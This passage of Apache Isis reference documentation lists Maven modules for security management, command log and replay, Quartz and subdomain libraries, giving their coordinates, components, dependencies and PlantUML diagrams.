xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationService.adoc[PermissionsEvaluationService], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceAbstract.adoc[PermissionsEvaluationServiceAbstract], 
xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceAllowBeatsVeto.adoc[PermissionsEvaluationServiceAllowBeatsVeto], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceVetoBeatsAllow.adoc[PermissionsEvaluationServiceVetoBeatsAllow], xref:refguide:extensions:index\/secman\/api\/role\/ApplicationRole.adoc[ApplicationRole], xref:refguide:extensions:index\/secman\/api\/role\/ApplicationRoleRepository.adoc[ApplicationRoleRepository], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancy.adoc[ApplicationTenancy], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancyEvaluator.adoc[ApplicationTenancyEvaluator], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancyRepository.adoc[ApplicationTenancyRepository], xref:refguide:extensions:index\/secman\/api\/tenancy\/HasAtPath.adoc[HasAtPath], xref:refguide:extensions:index\/secman\/api\/user\/AccountType.adoc[AccountType], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUser.adoc[ApplicationUser], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUserRepository.adoc[ApplicationUserRepository], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUserStatus.adoc[ApplicationUserStatus]\n****\n\n|Apache Isis Ext - Sec Man Encryption (Using jbcrypt)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-encryption-jbcrypt\nType: jar\nDirectory: \/extensions\/security\/secman\/encryption-jbcrypt\n----\n|.Components\n****\no.a.i.extensions.secman.encryption.jbcrypt.services.PasswordEncryptionServiceUsingJBcrypt +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.mindrot:jbcrypt:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/encryption\/jbcrypt\/IsisModuleExtSecmanEncryptionJbcrypt.adoc[IsisModuleExtSecmanEncryptionJbcrypt], xref:refguide:extensions:index\/secman\/encryption\/jbcrypt\/services\/PasswordEncryptionServiceUsingJBcrypt.adoc[PasswordEncryptionServiceUsingJBcrypt]\n****\n\n|Apache Isis Ext - Sec Man Model\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-model\nType: jar\nDirectory: \/extensions\/security\/secman\/model\n----\n|.Components\n****\no.a.i.extensions.secman.model.facets.TenantedAuthorizationFacetFactory$Register +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/model\/IsisModuleExtSecmanModel.adoc[IsisModuleExtSecmanModel], xref:refguide:extensions:index\/secman\/model\/dom\/user\/MeService.adoc[MeService]\n****\n\n|Apache Isis Ext - Sec Man Persistence (Using JDO)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-persistence-jdo\nType: jar\nDirectory: \/extensions\/security\/secman\/persistence-jdo\n----\n|.Components\n****\no.a.i.extensions.secman.jdo.dom.permission.ApplicationPermissionRepository +\no.a.i.extensions.secman.jdo.dom.role.ApplicationRoleRepository +\no.a.i.extensions.secman.jdo.dom.tenancy.ApplicationTenancyRepository +\no.a.i.extensions.secman.jdo.dom.user.ApplicationUserRepository +\no.a.i.extensions.secman.jdo.seed.SeedSecurityModuleService 
+\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/jdo\/IsisModuleExtSecmanPersistenceJdo.adoc[IsisModuleExtSecmanPersistenceJdo], xref:refguide:extensions:index\/secman\/jdo\/seed\/SeedSecurityModuleService.adoc[SeedSecurityModuleService], xref:refguide:extensions:index\/secman\/jdo\/seed\/SeedUsersAndRolesFixtureScript.adoc[SeedUsersAndRolesFixtureScript], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/GlobalTenancy.adoc[GlobalTenancy], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtFixturesFixtureResultsRoleAndPermissions.adoc[IsisExtFixturesFixtureResultsRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanAdminRoleAndPermissions.adoc[IsisExtSecmanAdminRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanAdminUser.adoc[IsisExtSecmanAdminUser], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanFixtureRoleAndPermissions.adoc[IsisExtSecmanFixtureRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanRegularUserRoleAndPermissions.adoc[IsisExtSecmanRegularUserRoleAndPermissions]\n****\n\n|Apache Isis Ext - Sec Man Persistence (Using JPA)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-persistence-jpa\nType: jar\nDirectory: \/extensions\/security\/secman\/persistence-jpa\n----\n|.Components\n****\no.a.i.extensions.secman.jpa.dom.permission.ApplicationPermissionRepository +\no.a.i.extensions.secman.jpa.dom.role.ApplicationRoleRepository +\no.a.i.extensions.secman.jpa.dom.tenancy.ApplicationTenancyRepository +\no.a.i.extensions.secman.jpa.dom.user.ApplicationUserRepository +\no.a.i.extensions.secman.jpa.seed.SeedSecurityModuleService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/jpa\/IsisModuleExtSecmanPersistenceJpa.adoc[IsisModuleExtSecmanPersistenceJpa], xref:refguide:extensions:index\/secman\/jpa\/seed\/SeedSecurityModuleService.adoc[SeedSecurityModuleService], xref:refguide:extensions:index\/secman\/jpa\/seed\/SeedUsersAndRolesFixtureScript.adoc[SeedUsersAndRolesFixtureScript], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/GlobalTenancy.adoc[GlobalTenancy], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtFixturesFixtureResultsRoleAndPermissions.adoc[IsisExtFixturesFixtureResultsRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanAdminRoleAndPermissions.adoc[IsisExtSecmanAdminRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanAdminUser.adoc[IsisExtSecmanAdminUser], 
xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanFixtureRoleAndPermissions.adoc[IsisExtSecmanFixtureRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanRegularUserRoleAndPermissions.adoc[IsisExtSecmanRegularUserRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/userreg\/SecurityModuleAppUserRegistrationServiceAbstract.adoc[SecurityModuleAppUserRegistrationServiceAbstract]\n****\n\n|Apache Isis Ext - Sec Man Realm (Using Shiro)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-shiro-realm\nType: jar\nDirectory: \/extensions\/security\/secman\/shiro-realm\n----\n|.Components\n****\no.a.i.extensions.secman.shiro.services.SecurityRealmServiceUsingShiro +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:2.0.0-SNAPSHOT +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/shiro\/IsisModuleExtSecmanRealmShiro.adoc[IsisModuleExtSecmanRealmShiro], xref:refguide:extensions:index\/secman\/shiro\/IsisModuleExtSecmanShiroRealm.adoc[IsisModuleExtSecmanShiroRealm], xref:refguide:extensions:index\/secman\/shiro\/services\/SecurityRealmServiceUsingShiro.adoc[SecurityRealmServiceUsingShiro], xref:refguide:extensions:index\/secman\/shiro\/util\/ShiroUtils.adoc[ShiroUtils]\n****\n\n|Apache Isis Ext - Security - Shiro LDAP Realm (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-shiro-realm-ldap\nType: pom\nDirectory: \/extensions\/security\/shiro-realm-ldap\n----\n|Implementation of Shiro Realm using LDAP.\n\n|Apache Isis Ext - Security - Shiro LDAP Realm (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-shiro-realm-ldap-impl\nType: jar\nDirectory: \/extensions\/security\/shiro-realm-ldap\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisLdapContextFactory.adoc[IsisLdapContextFactory], xref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisLdapRealm.adoc[IsisLdapRealm], xref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisModuleExtShiroRealmLdapImpl.adoc[IsisModuleExtShiroRealmLdapImpl]\n****\n|===\n\n=== Core: Command Log\n\n[plantuml,Core: Command Log,svg]\n----\n@startuml(id=Core:_Command_Log)\ntitle Core: Command Log - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Command Log\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Command Log\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Command Log Implementation (JDO)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Command Log)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Command 
Log\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-log\nType: pom\nDirectory: \/extensions\/core\/command-log\n----\n|Logs commands\n\n|Apache Isis Ext - Command Log Implementation (JDO)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-log-jdo\nType: jar\nDirectory: \/extensions\/core\/command-log\/impl\n----\n|.Components\n****\no.a.i.extensions.commandlog.impl.CommandSubscriberForJdo +\no.a.i.extensions.commandlog.impl.jdo.CommandJdo$TableColumnOrderDefault +\no.a.i.extensions.commandlog.impl.jdo.CommandJdo$TitleProvider +\no.a.i.extensions.commandlog.impl.jdo.CommandJdoRepository +\no.a.i.extensions.commandlog.impl.ui.CommandServiceMenu +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandlog\/impl\/CommandSubscriberForJdo.adoc[CommandSubscriberForJdo], xref:refguide:extensions:index\/commandlog\/impl\/IsisModuleExtCommandLogImpl.adoc[IsisModuleExtCommandLogImpl], xref:refguide:extensions:index\/commandlog\/impl\/mixins\/HasInteractionId_command.adoc[HasInteractionId_command], xref:refguide:extensions:index\/commandlog\/impl\/mixins\/HasUsername_recentCommandsByUser.adoc[HasUsername_recentCommandsByUser], xref:refguide:extensions:index\/commandlog\/impl\/ui\/CommandServiceMenu.adoc[CommandServiceMenu]\n****\n|===\n\n=== Core: Command Replay\n\n[plantuml,Core: Command Replay,svg]\n----\n@startuml(id=Core:_Command_Replay)\ntitle Core: Command Replay - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Command Replay\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Command Replay\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Command Replay for Primary\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - Command Replay for Secondary\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Command Replay)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Command Replay\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay\nType: pom\nDirectory: \/extensions\/core\/command-replay\n----\n|Replays commands to secondary system\n\n|Apache Isis Ext - Command Replay for Primary\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay-primary\nType: jar\nDirectory: \/extensions\/core\/command-replay\/primary\n----\n|A module for 
obtaining commands from a primary\n\n.Components\n****\no.a.i.extensions.commandreplay.primary.config.PrimaryConfig +\no.a.i.extensions.commandreplay.primary.spiimpl.CaptureResultOfCommand +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-impl:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandreplay\/primary\/IsisModuleExtCommandReplayPrimary.adoc[IsisModuleExtCommandReplayPrimary], xref:refguide:extensions:index\/commandreplay\/primary\/config\/PrimaryConfig.adoc[PrimaryConfig], xref:refguide:extensions:index\/commandreplay\/primary\/mixins\/Object_openOnSecondary.adoc[Object_openOnSecondary], xref:refguide:extensions:index\/commandreplay\/primary\/restapi\/CommandRetrievalService.adoc[CommandRetrievalService], xref:refguide:extensions:index\/commandreplay\/primary\/ui\/CommandReplayOnPrimaryService.adoc[CommandReplayOnPrimaryService]\n****\n\n|Apache Isis Ext - Command Replay for Secondary\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay-secondary\nType: jar\nDirectory: \/extensions\/core\/command-replay\/secondary\n----\n|A module providing a Quartz Job to run on a secondary system,\nfor obtaining commands from a primary and saving them so that they are replayed.\n\n.Components\n****\no.a.i.extensions.commandreplay.secondary.analyser.CommandReplayAnalyserException +\no.a.i.extensions.commandreplay.secondary.analyser.CommandReplayAnalyserResult +\no.a.i.extensions.commandreplay.secondary.analysis.CommandReplayAnalysisService +\no.a.i.extensions.commandreplay.secondary.clock.TickingClockService +\no.a.i.extensions.commandreplay.secondary.config.SecondaryConfig +\no.a.i.extensions.commandreplay.secondary.executor.CommandExecutorServiceWithTime +\no.a.i.extensions.commandreplay.secondary.fetch.CommandFetcher +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-quartz-impl:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-impl:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandreplay\/secondary\/IsisModuleExtCommandReplaySecondary.adoc[IsisModuleExtCommandReplaySecondary], xref:refguide:extensions:index\/commandreplay\/secondary\/SecondaryStatus.adoc[SecondaryStatus], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyser.adoc[CommandReplayAnalyser], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyserException.adoc[CommandReplayAnalyserException], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyserResult.adoc[CommandReplayAnalyserResult], 
xref:refguide:extensions:index\/commandreplay\/secondary\/analysis\/CommandReplayAnalysisService.adoc[CommandReplayAnalysisService], xref:refguide:extensions:index\/commandreplay\/secondary\/clock\/TickingClockService.adoc[TickingClockService], xref:refguide:extensions:index\/commandreplay\/secondary\/config\/SecondaryConfig.adoc[SecondaryConfig], xref:refguide:extensions:index\/commandreplay\/secondary\/executor\/CommandExecutorServiceWithTime.adoc[CommandExecutorServiceWithTime], xref:refguide:extensions:index\/commandreplay\/secondary\/fetch\/CommandFetcher.adoc[CommandFetcher], xref:refguide:extensions:index\/commandreplay\/secondary\/job\/ReplicateAndReplayJob.adoc[ReplicateAndReplayJob], xref:refguide:extensions:index\/commandreplay\/secondary\/job\/SecondaryStatusData.adoc[SecondaryStatusData], xref:refguide:extensions:index\/commandreplay\/secondary\/jobcallables\/ReplicateAndRunCommands.adoc[ReplicateAndRunCommands], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/CommandJdo_exclude.adoc[CommandJdo_exclude], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/CommandJdo_replayQueue.adoc[CommandJdo_replayQueue], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/Object_openOnPrimary.adoc[Object_openOnPrimary], xref:refguide:extensions:index\/commandreplay\/secondary\/spi\/ReplayCommandExecutionController.adoc[ReplayCommandExecutionController], xref:refguide:extensions:index\/commandreplay\/secondary\/ui\/CommandReplayOnSecondaryService.adoc[CommandReplayOnSecondaryService]\n****\n|===\n\n=== Core: Model Annotation\n\n[plantuml,Core: Model Annotation,svg]\n----\n@startuml(id=Core:_Model_Annotation)\ntitle Core: Model Annotation - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Model Annotation\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - @Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Core: Model Annotation)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - @Model\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-modelannotation\nType: jar\nDirectory: \/extensions\/core\/model-annotation\n----\n|Allows supporting methods to be annotated as @Model, to make explicit the bounds of the metamodel.\n\n.Components\n****\no.a.i.extensions.modelannotation.metamodel.services.IncubatorMetaModelPlugin +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/modelannotation\/applib\/IsisModuleIncModelApplib.adoc[IsisModuleIncModelApplib], xref:refguide:extensions:index\/modelannotation\/applib\/annotation\/Model.adoc[Model], xref:refguide:extensions:index\/modelannotation\/metamodel\/IsisModuleExtModelAnnotation.adoc[IsisModuleExtModelAnnotation], xref:refguide:extensions:index\/modelannotation\/metamodel\/facets\/SupportingMethodValidatorRefinerFactory.adoc[SupportingMethodValidatorRefinerFactory], 
xref:refguide:extensions:index\/modelannotation\/metamodel\/services\/IncubatorMetaModelPlugin.adoc[IncubatorMetaModelPlugin]\n****\n|===\n\n=== Core: Quartz\n\n[plantuml,Core: Quartz,svg]\n----\n@startuml(id=Core:_Quartz)\ntitle Core: Quartz - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Quartz\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Quartz\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Quartz Impl\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Quartz)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Quartz\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-quartz\nType: pom\nDirectory: \/extensions\/core\/quartz\n----\n|Integrates Quartz\n\n|Apache Isis Ext - Quartz Impl\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-quartz-impl\nType: jar\nDirectory: \/extensions\/core\/quartz\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.springframework.boot:spring-boot-starter-quartz:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/quartz\/IsisModuleExtQuartzImpl.adoc[IsisModuleExtQuartzImpl], xref:refguide:extensions:index\/quartz\/context\/JobExecutionData.adoc[JobExecutionData], xref:refguide:extensions:index\/quartz\/spring\/AutowiringSpringBeanJobFactory.adoc[AutowiringSpringBeanJobFactory]\n****\n|===\n\n=== Security: Secman\n\n=== Security: Shiro LDAP Realm\n\n=== RO Viewer: CORS\n\n=== Wicket Viewer: Excel Download\n\n=== Wicket Viewer: Full Calendar\n\n=== Wicket Viewer: Pdf.js\n\n== Subdomains\n\n[plantuml,Subdomains,svg]\n----\n@startuml(id=Subdomains)\ntitle Subdomains - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor 
#2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Subdomains\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Docx (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Sub - Docx (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Freemarker (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Sub - Freemarker (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Sub - Ognl (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Sub - Ognl (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Sub - PDF Box (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Sub - PDF Box (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Sub - Zip (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Sub - Zip (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Subdomains\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n3 .[#707070].> 4 : \"\"\n5 .[#707070].> 6 : \"\"\n7 .[#707070].> 8 : \"\"\n9 .[#707070].> 10 : \"\"\n11 .[#707070].> 12 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 11 : \"\"\n@enduml\n----\n.Projects\/Modules (Subdomains)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Subdomains\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains\nType: pom\nDirectory: \/subdomains\n----\n|A library of domain services and supporting subdomains (often technical in nature), to be called from the\ncore domain of an Apache Isis application (see the import sketch after this table).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Sub - Docx (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-docx\nType: pom\nDirectory: \/subdomains\/docx\n----\n|Uses the Apache POI library for mail merge functions of .docx Word documents\n\n|Apache Isis Sub - Docx (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-docx-applib\nType: jar\nDirectory: \/subdomains\/docx\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Freemarker (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-freemarker\nType: pom\nDirectory: \/subdomains\/freemarker\n----\n|Integrates Freemarker Library\n\n|Apache Isis Sub - Freemarker (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-freemarker-applib\nType: jar\nDirectory: \/subdomains\/freemarker\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Ognl (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-ognl\nType: pom\nDirectory: \/subdomains\/ognl\n----\n|Integrates Ognl Library\n\n|Apache Isis Sub - Ognl (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-ognl-applib\nType: jar\nDirectory: \/subdomains\/ognl\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - PDF Box (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-pdfbox\nType: pom\nDirectory: \/subdomains\/pdfbox\n----\n|Integrates PDF Box Library\n\n|Apache Isis Sub - PDF Box (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-pdfbox-applib\nType: jar\nDirectory: 